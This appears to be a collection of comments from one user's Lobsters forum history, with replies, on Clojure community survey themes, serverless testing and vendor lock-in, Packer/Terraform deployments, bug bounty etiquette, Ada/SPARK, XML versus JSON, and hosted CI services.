1. 6

    The main comment themes I found were:

    • Error messages: still a problem
    • Spec: promising, but how to adopt it fully is unclear
    • Docs: still bad, but getting a little better
    • Startup time: always been a problem, becoming more pressing with serverless computing
    • Marketing/adoption: Clojure still perceived as niche/unknown by non-technical folk
    • Language: some nice ideas for improvement
    • Language Development Process: not changing, still an issue
    • Community: mostly good, but elitist attitudes are a turnoff, and there is a growing perception CLJ is shrinking
    • Libraries: more guidance needed on how to put them together
    • Other targets: a little interest in targeting non-JS/JVM platforms
    • Typing: less than in previous years, perhaps people are finding spec meets their needs?
    • ClojureScript: improving fast, tooling still tricky, NPM integration still tricky
    • Tooling: still hard to put all the pieces together
    • Compliments: “Best. Language. Ever.”

    Lots of room for improvement here, but I still love working with Clojure and am thankful that I get to do so.

    1. 3

      I’m running on Google Cloud Platform, but there are enough similarities to AWS that hopefully this is helpful.

      I use Packer to bake a golden VM image that includes monitoring, logging, etc., based on the most recent Ubuntu 16.04 update. I rebuild the golden image roughly monthly, unless there is a security issue to patch. When I release new versions of the app, I build an app-specific image based on the latest golden image. It copies in an uberjar from Google Cloud Storage (built by Google Cloud Builder). All of the app images live in the same image family.
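      For the curious, a minimal sketch of such a golden-image Packer template (project and image names are illustrative, not my actual config):

        {
          "builders": [{
            "type": "googlecompute",
            "project_id": "my-project",
            "source_image_family": "ubuntu-1604-lts",
            "zone": "us-central1-a",
            "image_name": "golden-{{timestamp}}",
            "image_family": "golden",
            "ssh_username": "packer"
          }],
          "provisioners": [
            {"type": "shell", "inline": ["sudo apt-get update && sudo apt-get -y upgrade"]}
          ]
        }

      The app images can then use the golden family as their source_image_family and set their own image_family, which is how a family always resolves to the newest image when instances are created.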

      I then run a rolling update to replace the current instances in the managed instance group with the new instances.

      The whole infrastructure is managed with Terraform, but I only need to touch Terraform if I’m changing cluster configuration or other resources. Day to day updates don’t need to go through Terraform at all, although now that the GCP Terraform provider supports rolling updates, I may look at doing it with Terraform.

      It’s just me for everything, so I’m responsible for it all.

      1. 3

        I just backed this project on Kickstarter. If it can be made to work like it promises, it would be a huge productivity boost for me on several projects. Currently with Deps, I bake an image with Packer and Ansible for every new deployment (based on a golden image). That has been getting a bit slow, so I was looking at other deployment options. Having super fast Ansible builds would be great, and would make that less necessary.

        1. 2

          Hi Daniel, I keep forgetting to reply here – thanks so much for your support! For every nice complimentary comment, I’ve been receiving 5 complex questions elsewhere. I’ve just posted a short update, and although the campaign is running a little behind, it looks like it still has legs. I’m certainly here until the final hour. :) Thanks again!

        1. 3

          At work we’ve adopted ADRs – Architecture Decision Records. These are similar to RFCs, but a little lighter weight. We generally use them for any architectural decision that is likely to affect more than one person, that took a while to understand, or that will have an impact over a long time.

          The great thing about them is that they’re structured so they can be written stream-of-consciousness, articulating the context (usually the most important part), the decision, and its impact.
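          For reference, the widely used Nygard-style template is something like the sketch below (the title is a made-up example):

            Title: 12. Use PostgreSQL for persistence
            Status: Accepted
            Context: The forces at play and the situation that demands a decision.
            Decision: What we will do, stated in full sentences (“We will …”).
            Consequences: What becomes easier or harder as a result.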

          If we don’t have a decision immediately we can leave it open as a PR for discussion before finishing it.

          1. 5

            I’m really pleased with the quality of projects that were submitted to Clojurists Together, and my only regret is that we couldn’t pick more of them. A huge thanks to our awesome members, we couldn’t do it without y’all.

            1. 26

              https://hackerone.com/reports/293359#activity-2203160 via https://twitter.com/infosec_au/status/945048806290321408 seems to at least shed a bit more light on things. I don’t find this kind of behavior to be OK at all:

              “Oh my God.

              Are you seriously the Program Manager for Uber’s Security Division, with a 2013 psych degree and zero relevant industry experience other than technical recruiting?

              LULZ”

              1. 6

                The real impact with this vulnerability is the lack of rate limiting and/or IP address blacklisting for multiple successive failed authentication attempts, both issues of which were not mentioned within your summary dismissal of the report. Further, without exhaustive entropy analysis of the PRNG that feeds your token generation process, hand waving about 128 bits is meaningless if there are any discernible patterns that can be picked up in the PRNG.

                Hrm. He really wants to be paid for this?

                1. 3

                  I mean, it’s a lot better than, say, promising a minimum of 500 for unlisted vulnerabilities and then repeatedly not paying it. Also, that’s not an unfair critique–if you’re a program manager in a field, I’d expect some relevant experience. Or, maybe, we should be more careful about handing out titles like program manager, project manager, product manager, etc. (a common issue outside of security!).

                  At the core of it, it seems like the fellow dutifully tried to get some low-hanging fruit and was rebuffed, multiple times. This was compounded when the issues were closed as duplicate or known or unimportant or whatever…it’s impossible to tell the difference from the outside between a good actor saying “okay this is not something we care about” and a bad actor just wanting to save 500 bucks/save face.

                  Like, the correct thing to have done would have been to say “Hey, thanks for reporting that, we’re not sure that’s a priority concern right now, but here’s some amount of money/free t-shirt/Uber credits, please keep at it – try looking at …”

                  The fact that the company was happy to accept the work product but wouldn’t compensate the person for what sounded like hours and hours of work is a very bad showing.

                  1. 9

                    Also, that’s not an unfair critique–if you’re a program manager in a field, I’d expect some relevant experience.

                    No-one deserves to be talked to in that way, in any context, but especially not in a professional one.

                    Or, maybe, we should be more careful about handing out titles like program manager, project manager, product manager, etc. (a common issue outside of security!).

                    There is no evidence that the title was “handed out”, especially since we don’t even know what the job description is.

                    1. 3
                      1. open the hackerone thread
                      2. open her profile to find her name
                      3. look her up on LinkedIn

                      I don’t presume to know what her job entails or whether or not she’s qualified, but titles should reflect reality or they lose their value. She certainly has a lot of endorsements on LinkedIn, which often carry more value than formal education.

                      It’s “Program Manager, Security” btw.

                      1. 2

                        There is no evidence that the title was “handed out”, especially since we don’t even know what the job description is.

                        There’s no evidence that it wasn’t–the point I’m making is that, due to practices elsewhere in industry, that title doesn’t really mean anything concrete.

                  1. 11

                    Hey @loige, nice writeup! I’ve been aching to ask a few questions of someone ‘in the know’ for a while, so here goes:

                    How do serverless developers ensure their code performs to spec (local testing), handles anticipated load (stress testing), and degrades deterministically under adverse network conditions (Jepsen-style or chaos testing)? How do you implement backpressure? Load shedding? What about logging? Configuration? Continuous Integration?

                    All instances of applications written in a serverless style that I’ve come across so far (admittedly not too many) seemed to offer a Faustian bargain: “hello world” is super easy, but when stuff breaks, your only recourse is $BIGCO support. Additionally, your business is now non-trivially coupled to the $BIGCO and at the mercy of their decisions.

                    Can anyone with production experience chime in on the above issues?

                    1. 8

                      Great questions!

                      How do serverless developers ensure their code performs to spec (local testing)

                      AWS, for example, provides a local implementation of Lambda for testing (SAM Local). Otherwise normal testing applies: abstract your business logic into testable units that don’t depend on the transport layer.
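                      As a minimal sketch of that separation (hypothetical names, Python for illustration):

                        # handler.py – the Lambda entry point stays a thin adapter.
                        def apply_discount(order, rate):
                            """Pure business logic: easy to unit test, knows nothing about Lambda."""
                            return {**order, "total": round(order["total"] * (1 - rate), 2)}

                        def lambda_handler(event, context):
                            # Only this thin wrapper knows the shape of the Lambda event.
                            return apply_discount(event["order"], event.get("rate", 0.0))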

                      handles anticipated load (stress testing)

                      Staging environment.

                      and degrades deterministically under adverse network conditions (Jepsen-style or chaos testing)?

                      Trust Amazon / Microsoft / Google. Exporting this problem to your provider is one of the major value adds of serverless architecture.

                      How do you implement backpressure? Load shedding?

                      Providers usually have features for this, like rate limiting for different events. But it’s not turtles all the way down: eventually your code will touch a real datastore that can be overloaded, and you have to detect and propagate that condition just as in any other architecture.
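                      For instance, the “detect and propagate” part might look like this sketch (handler and table name are hypothetical; the DynamoDB error code is real):

                        import boto3
                        from botocore.exceptions import ClientError

                        table = boto3.resource("dynamodb").Table("orders")  # illustrative table name

                        def lambda_handler(event, context):
                            try:
                                table.put_item(Item={"id": event["id"]})
                            except ClientError as err:
                                if err.response["Error"]["Code"] == "ProvisionedThroughputExceededException":
                                    # Shed load: tell callers to back off rather than melt the datastore.
                                    return {"statusCode": 503, "headers": {"Retry-After": "1"}}
                                raise
                            return {"statusCode": 200}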

                      What about logging?

                      Also a provider value add.

                      Configuration?

                      Providers have environment variables or something spiritually similar.

                      Continuous Integration?

                      Same as local testing, but automated?

                      but when stuff breaks, your only recourse is $BIGCO support

                      If their underlying infrastructure breaks, yep. But every architecture has this problem; it just depends on who your provider is. When your PaaS provider breaks, when your IaaS provider breaks, when your colo provider breaks, when your datacenter breaks, when your electrical provider blacks out, when your fuel provider misses a delivery, when your fuel mines have an accident. The only difference is how big the provider is, and how much money its customers pay it not to break. Serverless is at the bottom of the money food chain; if you want fewer problems, you take on more responsibility and spend the money to do it better than the provider for your use case, or you use more than one provider.

                      Additionally, your business is now non-trivially coupled to the $BIGCO and at the mercy of their decisions.

                      Double-edged sword. You’ve non-trivially coupled to $BIGCO because you want them to make a lot of architectural decisions for you. So again, do it yourself, or use more than one provider.

                      1. 4

                        And great answers, thank you ;)

                        Having skimmed the SAM Local doc, it looks like they took the same approach as they did with DynamoDB local. I think this alleviates a lot of the practical issues around integrated testing. DynamoDB Local is great, but it’s still impossible to toggle throttling errors and other adverse conditions to check how the system handles these, end-to-end.

                        The staging-env and CI solution seems to be a natural extension of server-full development, fair enough. For stress testing specifically, though, it’s great to have full access to the SUT, and to be able to diagnose which components break (and why) as the load increases. This approach runs contrary to the opaque nature of the serverless substrate. You only get the metrics AWS/Google/etc. can provide you. I presume dtrace and friends are not welcome residents.

                        If their underlying infrastructure breaks, yep. But every architecture has this problem; it just depends on who your provider is. When your PaaS provider breaks, when your IaaS provider breaks, when your colo provider breaks, when your datacenter breaks, (…)

                        Well, there’s something to be said for being able to abstract away the service provider and just assume that there are simply nodes in a network. I want to know the ways in which a distributed system can fail – actually recreating the failing state is one way to find out and understand how the system behaves and what kind of countermeasures can be taken.

                        if you want fewer problems, you take on more responsibility

                        This is something of a pet peeve of mine. Because people delegate so much trust to cloud providers, individual engineers building software on top of these clouds are held to a lower and lower standard. If there is a hiccup, they can always blame “AWS issues”[1]. Rank-and-file developers won’t get asked why their software was not designed to gracefully handle these elusive “issues”. I think the learned word for this is the deskilling of the workforce.

                        [1] The lack of transparency on the part of the cloud providers around minor issues doesn’t help.

                        1. 3

                          For stress testing specifically, though, it’s great to have full access to the SUT, and to be able to diagnose which components break (and why) as the load increases.

                          It is great, and if you need it enough you’ll pay for it. If you won’t pay for it, you don’t need it, you just want it. If you can’t pay for it, and actually do need it, then that’s not a new problem either. Plenty of businesses fail because they don’t have enough money to pay for what they need.

                          This is something of a pet peeve of mine. Because people delegate so much trust to cloud providers, individual engineers building software on top of these clouds are held to a lower and lower standard. If there is a hiccup, they can always blame “AWS issues”[1]. Rank-and-file developers won’t get asked why their software was not designed to gracefully handle these elusive “issues”

                          I just meant to say you don’t have access to your provider’s infrastructure. But building more resilient systems takes more time, more skill, or both. In other words, money. Probably you’re right to a certain extent, but a lot of the time the money just isn’t there to build out that kind of resiliency. Businesses invest in however much resiliency will make them the most money for the cost.

                          So when you see that happening, ask yourself “would the engineering cost required to prevent this hiccup provide more business value than spending the same amount of money elsewhere?”

                      2. 4

                        @pzel You’ve hit the nail on the head here. See this post on AWS Lambda Reserved Concurrency for some of the issues you still face with Serverless style applications.

                        The Serverless architecture style makes a ton of sense for a lot of applications, however there are lots of missing pieces operationally. Things like the Serverless framework fill in the gaps for some of these, but not all of them. In 5 years time I’m sure a lot of these problems will have been solved, and questions of best practices will have some good answers, but right now it is very early.

                        1. 1

                          I agree with @danielcompton that serverless is still a pretty new practice in the market and we are still lacking an ecosystem able to support all the possible use cases. Time will pass and it will get better, but having spent the last 2 years building enterprise serverless applications, I have to say that the ecosystem is not that immature, and it can be used today with some extra effort. I believe that in most cases the benefits (not having to worry too much about the underlying infrastructure, not paying for idle, higher focus on business logic, high availability, and auto-scalability) far outweigh the extra effort needed to learn and use serverless today.

                        2. 3

                          Even though @peter already gave you some great answers, I will try to complement them with my personal experience/knowledge (I have used serverless on AWS for almost 2 years now building fairly complex enterprise apps).

                          How do serverless developers ensure their code performs to spec (local testing)

                          The way I do is a combination of the following practices:

                          • unit testing (see the sketch after this list)
                          • acceptance testing (with mocked services)
                          • local testing (manual, mostly using the serverless framework’s invoke local functionality, but pretty much equivalent to SAM). Not everything can be tested locally, depending on which services you use.
                          • remote testing environment (to test things that are hard to test locally)
                          • CI pipeline with multiple environments (run automated and manual tests in QA before deploying to production)
                          • smoke testing
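
                          To make the unit-testing point concrete, the tests target plain functions with any external service mocked out; a tiny illustrative sketch in Python (all names hypothetical):

                            # test_pricing.py – run with pytest
                            from unittest import mock

                            def total_price(items, tax_lookup):
                                """Business logic under test; tax_lookup abstracts a remote service."""
                                return sum(i["price"] * (1 + tax_lookup(i["category"])) for i in items)

                            def test_total_price_applies_tax():
                                tax_lookup = mock.Mock(return_value=0.25)  # mocked external tax service
                                items = [{"price": 100.0, "category": "books"}]
                                assert total_price(items, tax_lookup) == 125.0
                                tax_lookup.assert_called_once_with("books")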

                          What about logging?

                          In AWS you can use CloudWatch very easily. You can also integrate third parties like Loggly. I am sure other cloud providers have their own facilities around logging.
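                          As a sketch: on Lambda, anything written via the standard logging module (or stdout) lands in the function’s CloudWatch log group automatically, with no agent to run:

                            import logging

                            logger = logging.getLogger()
                            logger.setLevel(logging.INFO)

                            def lambda_handler(event, context):
                                # This line ends up in CloudWatch Logs without any extra setup.
                                logger.info("received event with %d keys", len(event))
                                return {"statusCode": 200}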

                          Configuration?

                          In AWS you can use Parameter Store to hold sensitive variables, and you can propagate them to your Lambda functions using environment variables. In terms of infrastructure as code (which you can include in the broad definition of “configuration”), you can adopt tools like Terraform or CloudFormation (on AWS specifically, the default choice of the serverless framework).
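                          A small sketch of that setup with boto3 (the parameter name is illustrative); non-sensitive settings can come straight from environment variables:

                            import os
                            import boto3

                            ssm = boto3.client("ssm")

                            def get_db_password():
                                # SecureString parameters are decrypted for us with WithDecryption=True.
                                resp = ssm.get_parameter(Name="/myapp/prod/db-password", WithDecryption=True)
                                return resp["Parameter"]["Value"]

                            STAGE = os.environ.get("STAGE", "dev")  # plain config via env vars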

                          Continuous Integration?

                          I have used serverless successfully with both Jenkins and CircleCI, but I guess almost any CI tool will do. You just need to configure your testing steps and your deployment strategy into a CI pipeline.

                          when stuff breaks, your only recourse is $BIGCO support

                          Sure. But chances are that your hand-rolled solution will be more likely to break than the one provided by any major cloud provider. Also, those cloud providers very often provide refunds if you have outages caused by the provider’s infrastructure (assuming you followed their best practices for high-availability setups).

                          your business is now non-trivially coupled to the $BIGCO

                          This is my favourite, as I have a very opinionated view on this matter. I simply believe it’s not possible to avoid vendor lock-in. Of course vendor lock-in comes in many shapes and forms and at different layers, but my point is that it’s fairly impractical to come up with an architecture so generic that it’s not affected by any kind of vendor lock-in. When you use a cloud provider and a methodology like serverless, it’s totally true that you have very high vendor lock-in, as you will be using specific services (e.g. API Gateway, Lambda, DynamoDB, S3 in AWS) that are unique to that provider, and equivalent services will have very different interfaces with other providers. But I believe the question should be: is it more convenient/practical to accept the risk of vendor lock-in than to spend a decent amount of extra time and effort coming up with a more abstracted infrastructure/app that allows switching cloud providers if needed? In my experience, it’s very rarely a good idea to over-abstract solutions only to reduce vendor lock-in.

                          I hope this can add another perspective to the discussion and enrich it a little bit. Feel free to ask more questions if you think my answer wasn’t sufficient here :)

                          1. 6

                            This is my favourite, as I have a very opinionated view on this matter. I simply believe it’s not possible to avoid vendor lock-in. Of course vendor lock-in comes in many shapes and forms and at different layers, but my point is that it’s fairly impractical to come up with an architecture so generic that it’s not affected by any kind of vendor lock-in.

                            Really? I find it quite easy to avoid vendor lock-in – simply running open-source tools on a VPS or dedicated server almost completely eliminates it. Even if a tool you use is discontinued, you can still use it, and you have the option of maintaining it yourself. That’s not at all the case with AWS Lambda/etc. Is there some form of vendor lock-in I should be worried about here, or do you simply consider this an impractical architecture?

                            When you use a cloud provider and a methodology like serverless, it’s totally true that you have very high vendor lock-in, as you will be using specific services (e.g. API Gateway, Lambda, DynamoDB, S3 in AWS) that are unique to that provider, and equivalent services will have very different interfaces with other providers. But I believe the question should be: is it more convenient/practical to accept the risk of vendor lock-in than to spend a decent amount of extra time and effort coming up with a more abstracted infrastructure/app that allows switching cloud providers if needed? In my experience, it’s very rarely a good idea to over-abstract solutions only to reduce vendor lock-in.

                            The thing about vendor lock-in is that there’s a quite low probability that you will pay an extremely high price (for example, the API/service you’re using being shut down). Even if it’s been amazing in all the cases you’ve used it in, it’s still entirely possible for the expected value of using these services to be negative, due to the possibility of vendor lock-in issues. Thus, I don’t buy that it’s worth the risk – you’re free to do your own risk/benefit calculations though :)

                            1. 1

                              I probably have to clarify that for me “vendor lock-in” is a very high-level concept that includes every sort of “tech lock-in” (which would probably be a better buzzword!).

                              My view is that even if you use an open-source technology and host it yourself, you end up making a lot of complex tech decisions that are going to be difficult (and expensive!) to move away from.

                              Have you ever tried to migrate from Redis to Memcached (or vice versa)? Even though the two systems are quite similar and a migration might seem trivial, in a complex infrastructure moving from one system to the other is still going to be a fairly complex operation with a lot of implications (code changes, language-driver changes, different interfaces, data migration, provisioning changes, etc.).

                              Also, another thing I am very opinionated about is what’s valuable when developing a tech product (especially in a startup context). I believe delivering value to the customers/stakeholders is the most important thing while building a product, so whatever abstraction makes it easier for the team to focus on business value deserves my attention. In that respect I found serverless to be a very good abstraction, so I am happy to accept some tradeoffs in having less “tech freedom” (I have to stick to the solutions given by my cloud provider) and higher vendor lock-in.

                            2. 2

                              I simply believe it’s not possible to avoid vendor lock-in.

                              Well, there is vendor lock-in and vendor lock-in… Ever heard of Oracle Forms?

                          1. 2

                            You can configure CircleCI v1 through the web interface, and CircleCI v2 is configured via .circleci/config.yml.

                            1. 1

                              Thanks!

                              It seems a bit more complicated, though. The CircleCI 1.0 configuration docs state at the very beginning that:

                              CircleCI automatically infers settings from your code, so it’s possible you won’t need to add any custom configuration. If you do need to tweak settings, you can create a circle.yml in your project’s root directory and CircleCI will read it each time it runs a build.

                              They don’t say anything about being able to provide such configuration without putting it in the repo. And there aren’t many details about this inference either.

                              1. 1

                                I don’t like that you cannot create a standalone account in CircleCI. You have to sign up via GitHub, BitBucket or Google. Even if you sign up via Google, you have to connect GitHub or BitBucket if you want to start building anything.


                                GitHub

                                CircleCI by circleci wants to access your account

                                Personal user data
                                Email addresses (read-only)

                                This application will be able to read your private email addresses.

                                Repositories
                                Public and private

                                This application will be able to read and write all public and private repository data. This includes the following:

                                • Code
                                • Issues
                                • Pull requests
                                • Wikis
                                • Settings
                                • Webhooks and services
                                • Deploy keys
                                • Collaboration invites

                                BitBucket

                                CircleCI is requesting access to the following:

                                • Read your account information
                                • Read your team’s project settings and read repositories contained within your team’s projects
                                • Read your repositories and their pull requests
                                • Administer your repositories
                                • Read and modify your repositories
                                • Read your team membership information
                                • Read and modify your repositories’ webhooks
                              1. 4

                                Have you tried Ada? I never looked at it myself, but that article[1] posted today looks very interesting. And there seems to be a well supported web server with WS support[2]

                                [1] http://blog.adacore.com/theres-a-mini-rtos-in-my-language [2] https://docs.adacore.com/aws-docs/aws/

                                1. 4

                                  TBH I can’t believe Ada is still alive. I thought it was something we covered in a Theory of Programming Languages course, and that nothing other than obsolete systems used it. Would give it a shot for sure!

                                  1. 4

                                    This article on using it for audio applications will give you a nice taste of the language:

                                    http://www.electronicdesign.com/embedded-revolution/assessing-ada-language-audio-applications

                                    This Barnes book shows how it’s systematically designed for safety at every level:

                                    https://www.adacore.com/books/safe-and-secure-software

                                    Note: The AdaCore website has a section called Gems that gives tips on a lot of useful ways to apply Ada.

                                    Finally, if you do Ada, you get the option of using Design-by-Contract (built into Ada 2012) and/or the SPARK language. One gives you clear specifications of program behavior that take you right to the source of errors when fuzzing or the like. The other is a smaller variant of Ada that integrates with automated theorem provers to try to prove your code free of common errors in all cases, versus just the ones you think of with testing. Those errors include things like integer overflow or division by zero. Here are some resources on those:

                                    http://www.eiffel.com/developers/design_by_contract_in_detail.html

                                    https://en.wikipedia.org/wiki/SPARK_(programming_language)

                                    https://www.amazon.com/Building-High-Integrity-Applications-SPARK/dp/1107040736

                                    The book and even the language were designed for people without a background in formal methods. I’ve gotten positive feedback from a few people on it. Also, I encouraged some people to try SPARK for safer native methods in languages such as Go. It’s kludgier than things like Rust that were designed with that in mind, but it still works.

                                    1. 2

                                      I’ve taken a look around Ada and got quite confused about the ecosystem and which versions of the language are available for free vs. commercial use. Are you able to give an overview of the different dialects/versions/recommended starting points?

                                      1. 4

                                        The main compiler vendor for Ada is AdaCore – that’s the commercial compiler. There is an open-source version that AdaCore helps to develop, called GNAT, and it’s part of the GCC toolchain. It’s licensed under either a special GMGPL license or GPLv3 with a runtime exception – meaning you can use both for closed-source software development (as long as you don’t modify the compiler, that is).

                                        There is also GNAT AUX, which was developed by John Marino as part of a project I was involved in some time ago.

                                        1. 1

                                          Thanks for clearing up the unusual license.

                                        2. 2

                                          I hear there is or was some weird stuff involved in the licensing. I’m not sure exactly what’s going on there. I just know they have a GPL version of GNAT that seems like it can be used with GPL’d programs:

                                          https://www.adacore.com/community

                                          Here’s more on that:

                                          https://en.wikipedia.org/wiki/GNAT

                                  1. 18

                                    This is something that the rest of the team and I have been working on for more than a year. I think open source sustainability is going to be one of the big issues the tech community needs to face in the next ten years, in all communities, but particularly in niche ones like Clojure. Ruby Together has a really good model, so we copied it and applied it to the Clojure community (with some tweaks). Happy to answer any questions people have.

                                    1. 17

                                      Thank you for putting this together–all of you. I’m signing up Jepsen as a corporate sponsor right now.

                                    1. 3

                                      I’m currently using Alice + Bob as known users in my tests. I use Eve as a malicious user who probes security boundaries, instead of just submitting wrong data.

                                      1. 2

                                        This kind of attack isn’t possible (AFAIK) on Google Cloud, because you need to set a Metadata-Flavor header or it won’t respond with any data. https://cloud.google.com/compute/docs/storing-retrieving-metadata#querying. Obviously there’s lots of other things that can go wrong with reflected XSS, but defense in depth is always good. I suspect it might be well too late for AWS to switch to a method like this though.
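                                        Concretely, a metadata query only succeeds with the header set (endpoint and header are from the docs above; Python sketch, run from a GCE instance):

                                          import requests

                                          # Without the Metadata-Flavor header, the GCP metadata server refuses
                                          # to answer, which blocks requests forged via reflected XSS/SSRF
                                          # tricks that can't set custom headers.
                                          resp = requests.get(
                                              "http://metadata.google.internal/computeMetadata/v1/instance/hostname",
                                              headers={"Metadata-Flavor": "Google"},
                                          )
                                          print(resp.text)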

                                        1. 4

                                          What are lobsters’ thoughts on XML, by the way? As a younger person looking back in this age of JSON, it seems like it actually had a bunch of neat ideas, wrapped up in a terrible syntax and some excessive feature bloat. Is there any work being done on salvaging some of it, or is it kind of a lost cause?

                                          1. 8

                                            Aside from the awful syntax, XML has terminal featuritis (and, as an immediate consequence, a bunch of useful features; they’re just mixed in with a bunch of less useful ones). Simpler formats are usually better. Personally, in the absence of other requirements, for human-readable data, I’d use JSON; for human-writeable, YAML (though it has its own featuritis issues); for human-unreadable (i.e., binary), protobuf, though there’s actually been a relative proliferation of these lately (others to consider: Cap’n Proto, Avro).

                                            At this point, I’d drop XML other than for backwards compatibility. There are enough widely-supported alternatives which hit a useful subset of its features that I don’t expect anyone to put a lot of effort into making a “better” XML.

                                            1. 1

                                              If JSON or YAML will suffice, then XML was probably a terrible tool for the job. But I haven’t found a good alternative to XMLNS yet.

                                            2. 6

                                              There are some good ideas in the XML ecosystem, but IMO the problem with it is that it doesn’t map to most programming language data structures. JavaScript, PHP, Python, Perl, Ruby all essentially have the JSON data model – dynamically typed dicts, lists, strings, numbers, booleans. JSON is the lowest common denominator between them all.

                                              Between those 5 languages, that’s probably 95%+ of web apps, so you can see why JSON is a better fit than XML for communicating structured data between processes (not to mention that one side of the wire is usually JavaScript).

                                              The syntax of XML isn’t terrible; it’s only terrible if you use it for the wrong thing. The syntax of JSON is terrible if you’re say writing HTML with it:

                                              { "tag": "p",
                                                "content": ["This is my paragraph with text in ", {"tag": "b", "content": "bold" }, "\n"  ]
                                              }
                                              

                                              That is a horrible syntax for a document, just like XML is a bad syntax for structured data. I think people tend to overthink this. Use XML when you need to annotate text with attributes; Use JSON when you have structured data.
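
                                              For contrast, the markup version of that example is just: <p>This is my paragraph with text in <b>bold</b></p>, which is compact precisely because annotating text is what the syntax is for.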

                                              I haven’t used XML lately but I imagine it’s still good for book toolchains and so forth. I think there is a habit of overengineering those kinds of tools though. I use HTML a lot these days and it works well.

                                              Historically people DID try to abuse XML into the role of JSON, e.g. for database dumps (which JSON isn’t even great at). But people learned their lesson, I suppose. There is a tendency to try to make a particular technology “universal” and apply it to domains where it doesn’t fit.

                                              1. 4

                                                I’ve commented here a bunch on the topic of self-describing data in general, either to explain my view that the real problem is not the data format, but rather the schema… or to plug my incomplete project Modern Data, which I conceived of in a manic episode, so I make no apology for its grand scope, but I’m not sure when if ever I’ll have time to finish it…

                                                The project will someday, maybe be a self-describing schema format for dependently typed object graphs. To be useful it needs not only the basic typechecker, serializers, and deserializers, but also tools like diff and structure editors… The idea is that you could write a Modern Data schema for any existing file format (regardless of whether it’s based on something like XML or JSON, or it’s a low-level format more like PNG), and then gain the full benefit of the tooling ecosystem.

                                                It’s the kind of thing that I think many people would use if it were mature, but it’s challenging to get people interested in building it before it is.

                                                Anyway, the real problem is schemas. :) Every major serialization format I’m aware of has had major controversy over whether and how to support schemas, including formats such as JSON which originally tried to exist without any such support - it’s important enough that people tend to invent schema formats if they aren’t provided. There’s often a desire to make the schema format itself be something not-fully-general which maps naturally onto the kinds of data people want to represent in the underlying format. This is motivated by valid and important concerns about tooling support, but it never seems to actually get to the point where it meets everyone’s needs…

                                                And, of course, most self-describing data formats are more-or-less trees. That means they can’t handle certain situations where performance is important; for that you need arbitrary graphs, often implemented through some sort of intra-file pointer.

                                                1. 1

                                                  This sounds super interesting, have you written about it more anywhere else?

                                                  1. 2

                                                    Kind of, but I’ve never put together a good write-up of the motivation. See https://github.com/IreneKnapp/modern-data, and also somebody I met here once started an effort to redo the documentation, over at https://github.com/tinyplasticgreyknight/modern-docs.

                                                2. 3

                                                  JSON and XML solve totally different problems. You can abuse one to do what the other does, but that way lies pain.

                                                  JSON is an encoding for some common data structures and types: map, list, string, number, boolean

                                                  XML has none of these, but is a way to graft different kinds of data together in a single document such that parsers can use the parts they understand, and ignore the parts they don’t. Namespaces are the “eXtensible” part.

                                                  1. 2

                                                    It’s a markup language and it’s not terrible at markup.

                                                  1. 2

                                                    Attempting to get my home network running with two WAN connections. Currently they’re running in failover mode quite happily, but I want to get the router wanging traffic down both connections as a matter of course.

                                                    Off to Kraków, Poland mid-week for a few days. Sightseeing mostly, which I’m looking forward to. Should probably dust off the camera before I go.

                                                    1. 2

                                                      Are you wanting to bond the two connections, or share the load between them? I did load sharing with a Ubiquiti Edge Router Lite which worked pretty well.

                                                      1. 1

                                                        I’m not a networking person (below layer 3 is mostly a mystery to me) but I need to setup something in this space soon; what does bonding do that load sharing doesn’t?

                                                        1. 2

                                                          Bonding lets a single computer use the combined bandwidth of two connections, while sharing (probably not the right term) lets multiple computers each use a single connection. Bonding requires something at the “other end” to combine and split the sent and received traffic. It’s best done at your ISP, but that’s usually a business feature; you can also do it via a VPN-type service. The best option depends very much on your goals for having multiple connections: redundancy, max speed for a single connection, or sending Netflix over a cheaper connection and your work traffic over the fast 4G connection (my scenario).

                                                          1. 1

                                                            Thanks :)

                                                            I have two 4G links (my ISP sells a reasonably good speed-capped 4G plan which includes ~70% of the data transfer I need), but I only run one at a time and switch them over when I’m near the data cap.

                                                            This works alright, but I’d prefer to have traffic balanced across both and get double the speed (and hopefully better reliability).

                                                            Sounds like my best bet is to:

                                                            • Fire up a VPN box somewhere close by ($3/month)
                                                            • Get a decent wifi router (a couple of hundred dollars), bond the links via the VPN, connect everything to that router

                                                            Unfortunately the modems I have are locked-down and insist on doing DHCP etc - I guess I’ll have to filter that out somehow on the new router…

                                                            1. 1

                                                              I’ve never used them, but http://speedify.com is one option. “vpn bonding” is a good search term to use. I looked at getting a Mushroom, but they were too expensive. I also saw https://github.com/zehome/MLVPN, but have no experience with it.

                                                    1. 2

                                                      Here’s a question for the ages: are there any actually-existing good hosted CI providers out there?

                                                      1. 7

                                                        Not if you need speed: http://bitemyapp.com/posts/2016-03-28-speeding-up-builds.html

                                                        I would honestly pay good money for reliable, tested deployment automation that stood things like CI up.

                                                        1. 1

                                                          Who’d you end up going with for the dedicated server / what are the specs on that machine like?

                                                          1. 2

                                                            Approximately this with NVMe RAID: https://www.ovh.com/us/dedicated-servers/infra/173eg1.xml

                                                                      tbqh, most of the time we saved on compilation was lost to the GHCJS build later on. I was very sad.

                                                        2. 5

                                                          We use buildkite at my company. One nice aspect is that we get an agent to run on /our/ “hardware” (we just use large vm instances). It works pretty well.

                                                          1. 3

                                                            Another vote for buildkite here - their security posture is markedly better and you have much more control over performance.

                                                            1. 2

                                                                      It’s probably worth mentioning here that GitLab offers similar functionality with their GitLab CI offering. You can use their infrastructure or install runners (their equivalent of agents) on as many machines as you like. Disclaimer: I haven’t used either yet, but I attended a meetup event where somebody praised them highly and ditched their Atlassian stack for that single reason.

                                                              1. 1

                                                                        Their website looks intriguing; could you elaborate on their security posture? Is it just an artifact of the on-premise build agent, or is there more to it than that?

                                                            2. 5

                                                                    If you happen to run on Heroku, Heroku CI works quite well. You don’t wait in a queue – we just launch a new dyno for every CI run, which happens while you blink. It’s definitely not as full-featured as Circle, or even Travis, but it’s typically good enough.

                                                              1. 1

                                                                At $WORK we run some things on Heroku but we can’t or don’t want to for most things — it’s either too expensive or the workload isn’t really well-suited for it.

                                                              2. 4

                                                                What do you need? I like Travis, they also get vastly better when you actually use the paid offering and they offer on-premise should you actually need it.

                                                                1. 2

                                                                  I need builds to not take 25-30 minutes.

                                                                  Bloodhound averages 25 minutes right now on TravisCI and that’s after I did a lot of aggressive caching: https://travis-ci.org/bitemyapp/bloodhound/builds/286053172?utm_source=github_status&utm_medium=notification

                                                                  Gross.

                                                                  1. 2

                                                                    I was asking cmhamill.

